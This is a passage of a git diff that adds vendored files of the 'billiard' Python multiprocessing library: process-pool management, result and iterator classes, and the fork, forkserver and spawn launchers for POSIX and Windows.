self.cpu_count() if processes is None else processes + self.max_restarts = max_restarts or round(self._processes * 100) + self.restart_state = restart_state(max_restarts, max_restart_freq or 1) + + if initializer is not None and not callable(initializer): + raise TypeError('initializer must be a callable') + + if on_process_exit is not None and not callable(on_process_exit): + raise TypeError('on_process_exit must be callable') + + self._Process = self._ctx.Process + + self._pool = [] + self._poolctrl = {} + self._on_ready_counters = {} + self.putlocks = putlocks + self._putlock = semaphore or LaxBoundedSemaphore(self._processes) + for i in range(self._processes): + self._create_worker_process(i) + + self._worker_handler = self.Supervisor(self) + if threads: + self._worker_handler.start() + + self._task_handler = self.TaskHandler(self._taskqueue, + self._quick_put, + self._outqueue, + self._pool, + self._cache) + if threads: + self._task_handler.start() + + self.check_timeouts = None + + # Thread killing timedout jobs. + if self.enable_timeouts: + self._timeout_handler = self.TimeoutHandler( + self._pool, self._cache, + self.soft_timeout, self.timeout, + ) + self._timeout_handler_mutex = Lock() + self._timeout_handler_started = False + self._start_timeout_handler() + # If running without threads, we need to check for timeouts + # while waiting for unfinished work at shutdown. + if not threads: + self.check_timeouts = self._timeout_handler.handle_event + else: + self._timeout_handler = None + self._timeout_handler_started = False + self._timeout_handler_mutex = None + + # Thread processing results in the outqueue. + self._result_handler = self.create_result_handler() + self.handle_result_event = self._result_handler.handle_event + + if threads: + self._result_handler.start() + + self._terminate = Finalize( + self, self._terminate_pool, + args=(self._taskqueue, self._inqueue, self._outqueue, + self._pool, self._worker_handler, self._task_handler, + self._result_handler, self._cache, + self._timeout_handler, + self._help_stuff_finish_args()), + exitpriority=15, + ) + + def Process(self, *args, **kwds): + return self._Process(*args, **kwds) + + def WorkerProcess(self, worker): + return worker.contribute_to_object(self.Process(target=worker)) + + def create_result_handler(self, **extra_kwargs): + return self.ResultHandler( + self._outqueue, self._quick_get, self._cache, + self._poll_result, self._join_exited_workers, + self._putlock, self.restart_state, self.check_timeouts, + self.on_job_ready, on_ready_counters=self._on_ready_counters, + **extra_kwargs + ) + + def on_job_ready(self, job, i, obj, inqW_fd): + pass + + def _help_stuff_finish_args(self): + return self._inqueue, self._task_handler, self._pool + + def cpu_count(self): + try: + return cpu_count() + except NotImplementedError: + return 1 + + def handle_result_event(self, *args): + return self._result_handler.handle_event(*args) + + def _process_register_queues(self, worker, queues): + pass + + def _process_by_pid(self, pid): + return next(( + (proc, i) for i, proc in enumerate(self._pool) + if proc.pid == pid + ), (None, None)) + + def get_process_queues(self): + return self._inqueue, self._outqueue, None + + def _create_worker_process(self, i): + sentinel = self._ctx.Event() if self.allow_restart else None + inq, outq, synq = self.get_process_queues() + on_ready_counter = self._ctx.Value('i') + w = self.WorkerProcess(self.Worker( + inq, outq, synq, self._initializer, self._initargs, + self._maxtasksperchild, sentinel, self._on_process_exit, + # Need to handle all signals if using the ipc semaphore, + # to make sure the semaphore is released. + sigprotection=self.threads, + wrap_exception=self._wrap_exception, + max_memory_per_child=self._max_memory_per_child, + on_ready_counter=on_ready_counter, + )) + self._pool.append(w) + self._process_register_queues(w, (inq, outq, synq)) + w.name = w.name.replace('Process', 'PoolWorker') + w.daemon = True + w.index = i + w.start() + self._poolctrl[w.pid] = sentinel + self._on_ready_counters[w.pid] = on_ready_counter + if self.on_process_up: + self.on_process_up(w) + return w + + def process_flush_queues(self, worker): + pass + + def _join_exited_workers(self, shutdown=False): + """Cleanup after any worker processes which have exited due to + reaching their specified lifetime. Returns True if any workers were + cleaned up. + """ + now = None + # The worker may have published a result before being terminated, + # but we have no way to accurately tell if it did. So we wait for + # _lost_worker_timeout seconds before we mark the job with + # WorkerLostError. + for job in [job for job in list(self._cache.values()) + if not job.ready() and job._worker_lost]: + now = now or monotonic() + lost_time, lost_ret = job._worker_lost + if now - lost_time > job._lost_worker_timeout: + self.mark_as_worker_lost(job, lost_ret) + + if shutdown and not len(self._pool): + raise WorkersJoined() + + cleaned, exitcodes = {}, {} + for i in reversed(range(len(self._pool))): + worker = self._pool[i] + exitcode = worker.exitcode + popen = worker._popen + if popen is None or exitcode is not None: + # worker exited + debug('Supervisor: cleaning up worker %d', i) + if popen is not None: + worker.join() + debug('Supervisor: worked %d joined', i) + cleaned[worker.pid] = worker + exitcodes[worker.pid] = exitcode + if exitcode not in (EX_OK, EX_RECYCLE) and \ + not getattr(worker, '_controlled_termination', False): + error( + 'Process %r pid:%r exited with %r', + worker.name, worker.pid, human_status(exitcode), + exc_info=0, + ) + self.process_flush_queues(worker) + del self._pool[i] + del self._poolctrl[worker.pid] + del self._on_ready_counters[worker.pid] + if cleaned: + all_pids = [w.pid for w in self._pool] + for job in list(self._cache.values()): + acked_by_gone = next( + (pid for pid in job.worker_pids() + if pid in cleaned or pid not in all_pids), + None + ) + # already accepted by process + if acked_by_gone: + self.on_job_process_down(job, acked_by_gone) + if not job.ready(): + exitcode = exitcodes.get(acked_by_gone) or 0 + proc = cleaned.get(acked_by_gone) + if proc and getattr(proc, '_job_terminated', False): + job._set_terminated(exitcode) + else: + self.on_job_process_lost( + job, acked_by_gone, exitcode, + ) + else: + # started writing to + write_to = job._write_to + # was scheduled to write to + sched_for = job._scheduled_for + + if write_to and not write_to._is_alive(): + self.on_job_process_down(job, write_to.pid) + elif sched_for and not sched_for._is_alive(): + self.on_job_process_down(job, sched_for.pid) + + for worker in cleaned.values(): + if self.on_process_down: + if not shutdown: + self._process_cleanup_queues(worker) + self.on_process_down(worker) + return list(exitcodes.values()) + return [] + + def on_partial_read(self, job, worker): + pass + + def _process_cleanup_queues(self, worker): + pass + + def on_job_process_down(self, job, pid_gone): + pass + + def on_job_process_lost(self, job, pid, exitcode): + job._worker_lost = (monotonic(), exitcode) + + def mark_as_worker_lost(self, job, exitcode): + try: + raise WorkerLostError( + 'Worker exited prematurely: {0} Job: {1}.'.format( + human_status(exitcode), job._job), + ) + except WorkerLostError: + job._set(None, (False, ExceptionInfo())) + else: # pragma: no cover + pass + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + return self.terminate() + + def on_grow(self, n): + pass + + def on_shrink(self, n): + pass + + def shrink(self, n=1): + for i, worker in enumerate(self._iterinactive()): + self._processes -= 1 + if self._putlock: + self._putlock.shrink() + worker.terminate_controlled() + self.on_shrink(1) + if i >= n - 1: + break + else: + raise ValueError("Can't shrink pool. All processes busy!") + + def grow(self, n=1): + for i in range(n): + self._processes += 1 + if self._putlock: + self._putlock.grow() + self.on_grow(n) + + def _iterinactive(self): + for worker in self._pool: + if not self._worker_active(worker): + yield worker + + def _worker_active(self, worker): + for job in self._cache.values(): + if worker.pid in job.worker_pids(): + return True + return False + + def _repopulate_pool(self, exitcodes): + """Bring the number of pool processes up to the specified number, + for use after reaping workers which have exited. + """ + for i in range(self._processes - len(self._pool)): + if self._state != RUN: + return + try: + if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE): + self.restart_state.step() + except IndexError: + self.restart_state.step() + self._create_worker_process(self._avail_index()) + debug('added worker') + + def _avail_index(self): + assert len(self._pool) < self._processes + indices = set(p.index for p in self._pool) + return next(i for i in range(self._processes) if i not in indices) + + def did_start_ok(self): + return not self._join_exited_workers() + + def _maintain_pool(self): + """"Clean up any exited workers and start replacements for them. + """ + joined = self._join_exited_workers() + self._repopulate_pool(joined) + for i in range(len(joined)): + if self._putlock is not None: + self._putlock.release() + + def maintain_pool(self): + if self._worker_handler._state == RUN and self._state == RUN: + try: + self._maintain_pool() + except RestartFreqExceeded: + self.close() + self.join() + raise + except OSError as exc: + if get_errno(exc) == errno.ENOMEM: + raise MemoryError from exc + raise + + def _setup_queues(self): + self._inqueue = self._ctx.SimpleQueue() + self._outqueue = self._ctx.SimpleQueue() + self._quick_put = self._inqueue._writer.send + self._quick_get = self._outqueue._reader.recv + + def _poll_result(timeout): + if self._outqueue._reader.poll(timeout): + return True, self._quick_get() + return False, None + self._poll_result = _poll_result + + def _start_timeout_handler(self): + # ensure more than one thread does not start the timeout handler + # thread at once. + if self.threads and self._timeout_handler is not None: + with self._timeout_handler_mutex: + if not self._timeout_handler_started: + self._timeout_handler_started = True + self._timeout_handler.start() + + def apply(self, func, args=(), kwds={}): + ''' + Equivalent of `func(*args, **kwargs)`. + ''' + if self._state == RUN: + return self.apply_async(func, args, kwds).get() + + def starmap(self, func, iterable, chunksize=None): + ''' + Like `map()` method but the elements of the `iterable` are expected to + be iterables as well and will be unpacked as arguments. Hence + `func` and (a, b) becomes func(a, b). + ''' + if self._state == RUN: + return self._map_async(func, iterable, + starmapstar, chunksize).get() + + def starmap_async(self, func, iterable, chunksize=None, + callback=None, error_callback=None): + ''' + Asynchronous version of `starmap()` method. + ''' + if self._state == RUN: + return self._map_async(func, iterable, starmapstar, chunksize, + callback, error_callback) + + def map(self, func, iterable, chunksize=None): + ''' + Apply `func` to each element in `iterable`, collecting the results + in a list that is returned. + ''' + if self._state == RUN: + return self.map_async(func, iterable, chunksize).get() + + def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None): + ''' + Equivalent of `map()` -- can be MUCH slower than `Pool.map()`. + ''' + if self._state != RUN: + return + lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout + if chunksize == 1: + result = IMapIterator(self._cache, + lost_worker_timeout=lost_worker_timeout) + self._taskqueue.put(( + ((TASK, (result._job, i, func, (x,), {})) + for i, x in enumerate(iterable)), + result._set_length, + )) + return result + else: + assert chunksize > 1 + task_batches = Pool._get_tasks(func, iterable, chunksize) + result = IMapIterator(self._cache, + lost_worker_timeout=lost_worker_timeout) + self._taskqueue.put(( + ((TASK, (result._job, i, mapstar, (x,), {})) + for i, x in enumerate(task_batches)), + result._set_length, + )) + return (item for chunk in result for item in chunk) + + def imap_unordered(self, func, iterable, chunksize=1, + lost_worker_timeout=None): + ''' + Like `imap()` method but ordering of results is arbitrary. + ''' + if self._state != RUN: + return + lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout + if chunksize == 1: + result = IMapUnorderedIterator( + self._cache, lost_worker_timeout=lost_worker_timeout, + ) + self._taskqueue.put(( + ((TASK, (result._job, i, func, (x,), {})) + for i, x in enumerate(iterable)), + result._set_length, + )) + return result + else: + assert chunksize > 1 + task_batches = Pool._get_tasks(func, iterable, chunksize) + result = IMapUnorderedIterator( + self._cache, lost_worker_timeout=lost_worker_timeout, + ) + self._taskqueue.put(( + ((TASK, (result._job, i, mapstar, (x,), {})) + for i, x in enumerate(task_batches)), + result._set_length, + )) + return (item for chunk in result for item in chunk) + + def apply_async(self, func, args=(), kwds={}, + callback=None, error_callback=None, accept_callback=None, + timeout_callback=None, waitforslot=None, + soft_timeout=None, timeout=None, lost_worker_timeout=None, + callbacks_propagate=(), + correlation_id=None): + ''' + Asynchronous equivalent of `apply()` method. + + Callback is called when the functions return value is ready. + The accept callback is called when the job is accepted to be executed. + + Simplified the flow is like this: + + >>> def apply_async(func, args, kwds, callback, accept_callback): + ... if accept_callback: + ... accept_callback() + ... retval = func(*args, **kwds) + ... if callback: + ... callback(retval) + + ''' + if self._state != RUN: + return + soft_timeout = soft_timeout or self.soft_timeout + timeout = timeout or self.timeout + lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout + if soft_timeout and SIG_SOFT_TIMEOUT is None: + warnings.warn(UserWarning( + "Soft timeouts are not supported: " + "on this platform: It does not have the SIGUSR1 signal.", + )) + soft_timeout = None + if self._state == RUN: + waitforslot = self.putlocks if waitforslot is None else waitforslot + if waitforslot and self._putlock is not None: + self._putlock.acquire() + result = ApplyResult( + self._cache, callback, accept_callback, timeout_callback, + error_callback, soft_timeout, timeout, lost_worker_timeout, + on_timeout_set=self.on_timeout_set, + on_timeout_cancel=self.on_timeout_cancel, + callbacks_propagate=callbacks_propagate, + send_ack=self.send_ack if self.synack else None, + correlation_id=correlation_id, + ) + if timeout or soft_timeout: + # start the timeout handler thread when required. + self._start_timeout_handler() + if self.threads: + self._taskqueue.put(([(TASK, (result._job, None, + func, args, kwds))], None)) + else: + self._quick_put((TASK, (result._job, None, func, args, kwds))) + return result + + def send_ack(self, response, job, i, fd): + pass + + def terminate_job(self, pid, sig=None): + proc, _ = self._process_by_pid(pid) + if proc is not None: + try: + _kill(pid, sig or TERM_SIGNAL) + except OSError as exc: + if get_errno(exc) != errno.ESRCH: + raise + else: + proc._controlled_termination = True + proc._job_terminated = True + + def map_async(self, func, iterable, chunksize=None, + callback=None, error_callback=None): + ''' + Asynchronous equivalent of `map()` method. + ''' + return self._map_async( + func, iterable, mapstar, chunksize, callback, error_callback, + ) + + def _map_async(self, func, iterable, mapper, chunksize=None, + callback=None, error_callback=None): + ''' + Helper function to implement map, starmap and their async counterparts. + ''' + if self._state != RUN: + return + if not hasattr(iterable, '__len__'): + iterable = list(iterable) + + if chunksize is None: + chunksize, extra = divmod(len(iterable), len(self._pool) * 4) + if extra: + chunksize += 1 + if len(iterable) == 0: + chunksize = 0 + + task_batches = Pool._get_tasks(func, iterable, chunksize) + result = MapResult(self._cache, chunksize, len(iterable), callback, + error_callback=error_callback) + self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {})) + for i, x in enumerate(task_batches)), None)) + return result + + @staticmethod + def _get_tasks(func, it, size): + it = iter(it) + while 1: + x = tuple(itertools.islice(it, size)) + if not x: + return + yield (func, x) + + def __reduce__(self): + raise NotImplementedError( + 'pool objects cannot be passed between processes or pickled', + ) + + def close(self): + debug('closing pool') + if self._state == RUN: + self._state = CLOSE + if self._putlock: + self._putlock.clear() + self._worker_handler.close() + self._taskqueue.put(None) + stop_if_not_current(self._worker_handler) + + def terminate(self): + debug('terminating pool') + self._state = TERMINATE + self._worker_handler.terminate() + self._terminate() + + @staticmethod + def _stop_task_handler(task_handler): + stop_if_not_current(task_handler) + + def join(self): + assert self._state in (CLOSE, TERMINATE) + debug('joining worker handler') + stop_if_not_current(self._worker_handler) + debug('joining task handler') + self._stop_task_handler(self._task_handler) + debug('joining result handler') + stop_if_not_current(self._result_handler) + debug('result handler joined') + for i, p in enumerate(self._pool): + debug('joining worker %s/%s (%r)', i + 1, len(self._pool), p) + if p._popen is not None: # process started? + p.join() + debug('pool join complete') + + def restart(self): + for e in self._poolctrl.values(): + e.set() + + @staticmethod + def _help_stuff_finish(inqueue, task_handler, _pool): + # task_handler may be blocked trying to put items on inqueue + debug('removing tasks from inqueue until task handler finished') + inqueue._rlock.acquire() + while task_handler.is_alive() and inqueue._reader.poll(): + inqueue._reader.recv() + time.sleep(0) + + @classmethod + def _set_result_sentinel(cls, outqueue, pool): + outqueue.put(None) + + @classmethod + def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool, + worker_handler, task_handler, + result_handler, cache, timeout_handler, + help_stuff_finish_args): + + # this is guaranteed to only be called once + debug('finalizing pool') + + worker_handler.terminate() + + task_handler.terminate() + taskqueue.put(None) # sentinel + + debug('helping task handler/workers to finish') + cls._help_stuff_finish(*help_stuff_finish_args) + + result_handler.terminate() + cls._set_result_sentinel(outqueue, pool) + + if timeout_handler is not None: + timeout_handler.terminate() + + # Terminate workers which haven't already finished + if pool and hasattr(pool[0], 'terminate'): + debug('terminating workers') + for p in pool: + if p._is_alive(): + p.terminate() + + debug('joining task handler') + cls._stop_task_handler(task_handler) + + debug('joining result handler') + result_handler.stop() + + if timeout_handler is not None: + debug('joining timeout handler') + timeout_handler.stop(TIMEOUT_MAX) + + if pool and hasattr(pool[0], 'terminate'): + debug('joining pool workers') + for p in pool: + if p.is_alive(): + # worker has not yet exited + debug('cleaning up worker %d', p.pid) + if p._popen is not None: + p.join() + debug('pool workers joined') + + if inqueue: + inqueue.close() + if outqueue: + outqueue.close() + + @property + def process_sentinels(self): + return [w._popen.sentinel for w in self._pool] + +# +# Class whose instances are returned by `Pool.apply_async()` +# + + +class ApplyResult: + _worker_lost = None + _write_to = None + _scheduled_for = None + + def __init__(self, cache, callback, accept_callback=None, + timeout_callback=None, error_callback=None, soft_timeout=None, + timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT, + on_timeout_set=None, on_timeout_cancel=None, + callbacks_propagate=(), send_ack=None, + correlation_id=None): + self.correlation_id = correlation_id + self._mutex = Lock() + self._event = threading.Event() + self._job = next(job_counter) + self._cache = cache + self._callback = callback + self._accept_callback = accept_callback + self._error_callback = error_callback + self._timeout_callback = timeout_callback + self._timeout = timeout + self._soft_timeout = soft_timeout + self._lost_worker_timeout = lost_worker_timeout + self._on_timeout_set = on_timeout_set + self._on_timeout_cancel = on_timeout_cancel + self._callbacks_propagate = callbacks_propagate or () + self._send_ack = send_ack + + self._accepted = False + self._cancelled = False + self._worker_pid = None + self._time_accepted = None + self._terminated = None + cache[self._job] = self + + def __repr__(self): + return '<%s: {id} ack:{ack} ready:{ready}>'.format( + self.__class__.__name__, + id=self._job, ack=self._accepted, ready=self.ready(), + ) + + def ready(self): + return self._event.is_set() + + def accepted(self): + return self._accepted + + def successful(self): + assert self.ready() + return self._success + + def _cancel(self): + """Only works if synack is used.""" + self._cancelled = True + + def discard(self): + self._cache.pop(self._job, None) + + def terminate(self, signum): + self._terminated = signum + + def _set_terminated(self, signum=None): + try: + raise Terminated(-(signum or 0)) + except Terminated: + self._set(None, (False, ExceptionInfo())) + + def worker_pids(self): + return [self._worker_pid] if self._worker_pid else [] + + def wait(self, timeout=None): + self._event.wait(timeout) + + def get(self, timeout=None): + self.wait(timeout) + if not self.ready(): + raise TimeoutError + if self._success: + return self._value + else: + raise self._value.exception + + def safe_apply_callback(self, fun, *args, **kwargs): + if fun: + try: + fun(*args, **kwargs) + except self._callbacks_propagate: + raise + except Exception as exc: + error('Pool callback raised exception: %r', exc, + exc_info=1) + + def handle_timeout(self, soft=False): + if self._timeout_callback is not None: + self.safe_apply_callback( + self._timeout_callback, soft=soft, + timeout=self._soft_timeout if soft else self._timeout, + ) + + def _set(self, i, obj): + with self._mutex: + if self._on_timeout_cancel: + self._on_timeout_cancel(self) + self._success, self._value = obj + self._event.set() + if self._accepted: + # if not accepted yet, then the set message + # was received before the ack, which means + # the ack will remove the entry. + self._cache.pop(self._job, None) + + # apply callbacks last + if self._callback and self._success: + self.safe_apply_callback( + self._callback, self._value) + if (self._value is not None and + self._error_callback and not self._success): + self.safe_apply_callback( + self._error_callback, self._value) + + def _ack(self, i, time_accepted, pid, synqW_fd): + with self._mutex: + if self._cancelled and self._send_ack: + self._accepted = True + if synqW_fd: + return self._send_ack(NACK, pid, self._job, synqW_fd) + return + self._accepted = True + self._time_accepted = time_accepted + self._worker_pid = pid + if self.ready(): + # ack received after set() + self._cache.pop(self._job, None) + if self._on_timeout_set: + self._on_timeout_set(self, self._soft_timeout, self._timeout) + response = ACK + if self._accept_callback: + try: + self._accept_callback(pid, time_accepted) + except self._propagate_errors: + response = NACK + raise + except Exception: + response = NACK + # ignore other errors + finally: + if self._send_ack and synqW_fd: + return self._send_ack( + response, pid, self._job, synqW_fd + ) + if self._send_ack and synqW_fd: + self._send_ack(response, pid, self._job, synqW_fd) + +# +# Class whose instances are returned by `Pool.map_async()` +# + + +class MapResult(ApplyResult): + + def __init__(self, cache, chunksize, length, callback, error_callback): + ApplyResult.__init__( + self, cache, callback, error_callback=error_callback, + ) + self._success = True + self._length = length + self._value = [None] * length + self._accepted = [False] * length + self._worker_pid = [None] * length + self._time_accepted = [None] * length + self._chunksize = chunksize + if chunksize <= 0: + self._number_left = 0 + self._event.set() + del cache[self._job] + else: + self._number_left = length // chunksize + bool(length % chunksize) + + def _set(self, i, success_result): + success, result = success_result + if success: + self._value[i * self._chunksize:(i + 1) * self._chunksize] = result + self._number_left -= 1 + if self._number_left == 0: + if self._callback: + self._callback(self._value) + if self._accepted: + self._cache.pop(self._job, None) + self._event.set() + else: + self._success = False + self._value = result + if self._error_callback: + self._error_callback(self._value) + if self._accepted: + self._cache.pop(self._job, None) + self._event.set() + + def _ack(self, i, time_accepted, pid, *args): + start = i * self._chunksize + stop = min((i + 1) * self._chunksize, self._length) + for j in range(start, stop): + self._accepted[j] = True + self._worker_pid[j] = pid + self._time_accepted[j] = time_accepted + if self.ready(): + self._cache.pop(self._job, None) + + def accepted(self): + return all(self._accepted) + + def worker_pids(self): + return [pid for pid in self._worker_pid if pid] + +# +# Class whose instances are returned by `Pool.imap()` +# + + +class IMapIterator: + _worker_lost = None + + def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT): + self._cond = threading.Condition(threading.Lock()) + self._job = next(job_counter) + self._cache = cache + self._items = deque() + self._index = 0 + self._length = None + self._ready = False + self._unsorted = {} + self._worker_pids = [] + self._lost_worker_timeout = lost_worker_timeout + cache[self._job] = self + + def __iter__(self): + return self + + def next(self, timeout=None): + with self._cond: + try: + item = self._items.popleft() + except IndexError: + if self._index == self._length: + self._ready = True + raise StopIteration + self._cond.wait(timeout) + try: + item = self._items.popleft() + except IndexError: + if self._index == self._length: + self._ready = True + raise StopIteration + raise TimeoutError + + success, value = item + if success: + return value + raise Exception(value) + + __next__ = next # XXX + + def _set(self, i, obj): + with self._cond: + if self._index == i: + self._items.append(obj) + self._index += 1 + while self._index in self._unsorted: + obj = self._unsorted.pop(self._index) + self._items.append(obj) + self._index += 1 + self._cond.notify() + else: + self._unsorted[i] = obj + + if self._index == self._length: + self._ready = True + del self._cache[self._job] + + def _set_length(self, length): + with self._cond: + self._length = length + if self._index == self._length: + self._ready = True + self._cond.notify() + del self._cache[self._job] + + def _ack(self, i, time_accepted, pid, *args): + self._worker_pids.append(pid) + + def ready(self): + return self._ready + + def worker_pids(self): + return self._worker_pids + +# +# Class whose instances are returned by `Pool.imap_unordered()` +# + + +class IMapUnorderedIterator(IMapIterator): + + def _set(self, i, obj): + with self._cond: + self._items.append(obj) + self._index += 1 + self._cond.notify() + if self._index == self._length: + self._ready = True + del self._cache[self._job] + +# +# +# + + +class ThreadPool(Pool): + + from .dummy import Process as DummyProcess + Process = DummyProcess + + def __init__(self, processes=None, initializer=None, initargs=()): + Pool.__init__(self, processes, initializer, initargs) + + def _setup_queues(self): + self._inqueue = Queue() + self._outqueue = Queue() + self._quick_put = self._inqueue.put + self._quick_get = self._outqueue.get + + def _poll_result(timeout): + try: + return True, self._quick_get(timeout=timeout) + except Empty: + return False, None + self._poll_result = _poll_result + + @staticmethod + def _help_stuff_finish(inqueue, task_handler, pool): + # put sentinels at head of inqueue to make workers finish + with inqueue.not_empty: + inqueue.queue.clear() + inqueue.queue.extend([None] * len(pool)) + inqueue.not_empty.notify_all() diff --git a/env/Lib/site-packages/billiard/popen_fork.py b/env/Lib/site-packages/billiard/popen_fork.py new file mode 100644 index 00000000..caf14f8e --- /dev/null +++ b/env/Lib/site-packages/billiard/popen_fork.py @@ -0,0 +1,89 @@ +import os +import sys +import errno + +from .common import TERM_SIGNAL + +__all__ = ['Popen'] + +# +# Start child process using fork +# + + +class Popen: + method = 'fork' + sentinel = None + + def __init__(self, process_obj): + sys.stdout.flush() + sys.stderr.flush() + self.returncode = None + self._launch(process_obj) + + def duplicate_for_child(self, fd): + return fd + + def poll(self, flag=os.WNOHANG): + if self.returncode is None: + while True: + try: + pid, sts = os.waitpid(self.pid, flag) + except OSError as e: + if e.errno == errno.EINTR: + continue + # Child process not yet created. See #1731717 + # e.errno == errno.ECHILD == 10 + return None + else: + break + if pid == self.pid: + if os.WIFSIGNALED(sts): + self.returncode = -os.WTERMSIG(sts) + else: + assert os.WIFEXITED(sts) + self.returncode = os.WEXITSTATUS(sts) + return self.returncode + + def wait(self, timeout=None): + if self.returncode is None: + if timeout is not None: + from .connection import wait + if not wait([self.sentinel], timeout): + return None + # This shouldn't block if wait() returned successfully. + return self.poll(os.WNOHANG if timeout == 0.0 else 0) + return self.returncode + + def terminate(self): + if self.returncode is None: + try: + os.kill(self.pid, TERM_SIGNAL) + except OSError as exc: + if getattr(exc, 'errno', None) != errno.ESRCH: + if self.wait(timeout=0.1) is None: + raise + + def _launch(self, process_obj): + code = 1 + parent_r, child_w = os.pipe() + self.pid = os.fork() + if self.pid == 0: + try: + os.close(parent_r) + if 'random' in sys.modules: + import random + random.seed() + code = process_obj._bootstrap() + finally: + os._exit(code) + else: + os.close(child_w) + self.sentinel = parent_r + + def close(self): + if self.sentinel is not None: + try: + os.close(self.sentinel) + finally: + self.sentinel = None diff --git a/env/Lib/site-packages/billiard/popen_forkserver.py b/env/Lib/site-packages/billiard/popen_forkserver.py new file mode 100644 index 00000000..dfff2540 --- /dev/null +++ b/env/Lib/site-packages/billiard/popen_forkserver.py @@ -0,0 +1,68 @@ +import io +import os + +from . import reduction +from . import context +from . import forkserver +from . import popen_fork +from . import spawn + +__all__ = ['Popen'] + +# +# Wrapper for an fd used while launching a process +# + + +class _DupFd: + + def __init__(self, ind): + self.ind = ind + + def detach(self): + return forkserver.get_inherited_fds()[self.ind] + +# +# Start child process using a server process +# + + +class Popen(popen_fork.Popen): + method = 'forkserver' + DupFd = _DupFd + + def __init__(self, process_obj): + self._fds = [] + super().__init__(process_obj) + + def duplicate_for_child(self, fd): + self._fds.append(fd) + return len(self._fds) - 1 + + def _launch(self, process_obj): + prep_data = spawn.get_preparation_data(process_obj._name) + buf = io.BytesIO() + context.set_spawning_popen(self) + try: + reduction.dump(prep_data, buf) + reduction.dump(process_obj, buf) + finally: + context.set_spawning_popen(None) + + self.sentinel, w = forkserver.connect_to_new_process(self._fds) + with io.open(w, 'wb', closefd=True) as f: + f.write(buf.getbuffer()) + self.pid = forkserver.read_unsigned(self.sentinel) + + def poll(self, flag=os.WNOHANG): + if self.returncode is None: + from .connection import wait + timeout = 0 if flag == os.WNOHANG else None + if not wait([self.sentinel], timeout): + return None + try: + self.returncode = forkserver.read_unsigned(self.sentinel) + except (OSError, EOFError): + # The process ended abnormally perhaps because of a signal + self.returncode = 255 + return self.returncode diff --git a/env/Lib/site-packages/billiard/popen_spawn_posix.py b/env/Lib/site-packages/billiard/popen_spawn_posix.py new file mode 100644 index 00000000..5772a755 --- /dev/null +++ b/env/Lib/site-packages/billiard/popen_spawn_posix.py @@ -0,0 +1,74 @@ +import io +import os + +from . import context +from . import popen_fork +from . import reduction +from . import spawn + +from .compat import spawnv_passfds + +__all__ = ['Popen'] + + +# +# Wrapper for an fd used while launching a process +# + +class _DupFd: + + def __init__(self, fd): + self.fd = fd + + def detach(self): + return self.fd + +# +# Start child process using a fresh interpreter +# + + +class Popen(popen_fork.Popen): + method = 'spawn' + DupFd = _DupFd + + def __init__(self, process_obj): + self._fds = [] + super().__init__(process_obj) + + def duplicate_for_child(self, fd): + self._fds.append(fd) + return fd + + def _launch(self, process_obj): + os.environ["MULTIPROCESSING_FORKING_DISABLE"] = "1" + spawn._Django_old_layout_hack__save() + from . import semaphore_tracker + tracker_fd = semaphore_tracker.getfd() + self._fds.append(tracker_fd) + prep_data = spawn.get_preparation_data(process_obj._name) + fp = io.BytesIO() + context.set_spawning_popen(self) + try: + reduction.dump(prep_data, fp) + reduction.dump(process_obj, fp) + finally: + context.set_spawning_popen(None) + + parent_r = child_w = child_r = parent_w = None + try: + parent_r, child_w = os.pipe() + child_r, parent_w = os.pipe() + cmd = spawn.get_command_line(tracker_fd=tracker_fd, + pipe_handle=child_r) + self._fds.extend([child_r, child_w]) + self.pid = spawnv_passfds( + spawn.get_executable(), cmd, self._fds, + ) + self.sentinel = parent_r + with io.open(parent_w, 'wb', closefd=False) as f: + f.write(fp.getvalue()) + finally: + for fd in (child_r, child_w, parent_w): + if fd is not None: + os.close(fd) diff --git a/env/Lib/site-packages/billiard/popen_spawn_win32.py b/env/Lib/site-packages/billiard/popen_spawn_win32.py new file mode 100644 index 00000000..23254923 --- /dev/null +++ b/env/Lib/site-packages/billiard/popen_spawn_win32.py @@ -0,0 +1,121 @@ +import io +import os +import msvcrt +import signal +import sys + +from . import context +from . import spawn +from . import reduction + +from .compat import _winapi + +__all__ = ['Popen'] + +# +# +# + +TERMINATE = 0x10000 +WINEXE = (sys.platform == 'win32' and getattr(sys, 'frozen', False)) +WINSERVICE = sys.executable.lower().endswith("pythonservice.exe") + +# +# We define a Popen class similar to the one from subprocess, but +# whose constructor takes a process object as its argument. +# + + +if sys.platform == 'win32': + try: + from _winapi import CreateProcess, GetExitCodeProcess + close_thread_handle = _winapi.CloseHandle + except ImportError: # Py2.7 + from _subprocess import CreateProcess, GetExitCodeProcess + + def close_thread_handle(handle): + handle.Close() + + +class Popen: + ''' + Start a subprocess to run the code of a process object + ''' + method = 'spawn' + sentinel = None + + def __init__(self, process_obj): + os.environ["MULTIPROCESSING_FORKING_DISABLE"] = "1" + spawn._Django_old_layout_hack__save() + prep_data = spawn.get_preparation_data(process_obj._name) + + # read end of pipe will be "stolen" by the child process + # -- see spawn_main() in spawn.py. + rhandle, whandle = _winapi.CreatePipe(None, 0) + wfd = msvcrt.open_osfhandle(whandle, 0) + cmd = spawn.get_command_line(parent_pid=os.getpid(), + pipe_handle=rhandle) + cmd = ' '.join('"%s"' % x for x in cmd) + + with io.open(wfd, 'wb', closefd=True) as to_child: + # start process + try: + hp, ht, pid, tid = CreateProcess( + spawn.get_executable(), cmd, + None, None, False, 0, None, None, None) + close_thread_handle(ht) + except: + _winapi.CloseHandle(rhandle) + raise + + # set attributes of self + self.pid = pid + self.returncode = None + self._handle = hp + self.sentinel = int(hp) + + # send information to child + context.set_spawning_popen(self) + try: + reduction.dump(prep_data, to_child) + reduction.dump(process_obj, to_child) + finally: + context.set_spawning_popen(None) + + def close(self): + if self.sentinel is not None: + try: + _winapi.CloseHandle(self.sentinel) + finally: + self.sentinel = None + + def duplicate_for_child(self, handle): + assert self is context.get_spawning_popen() + return reduction.duplicate(handle, self.sentinel) + + def wait(self, timeout=None): + if self.returncode is None: + if timeout is None: + msecs = _winapi.INFINITE + else: + msecs = max(0, int(timeout * 1000 + 0.5)) + + res = _winapi.WaitForSingleObject(int(self._handle), msecs) + if res == 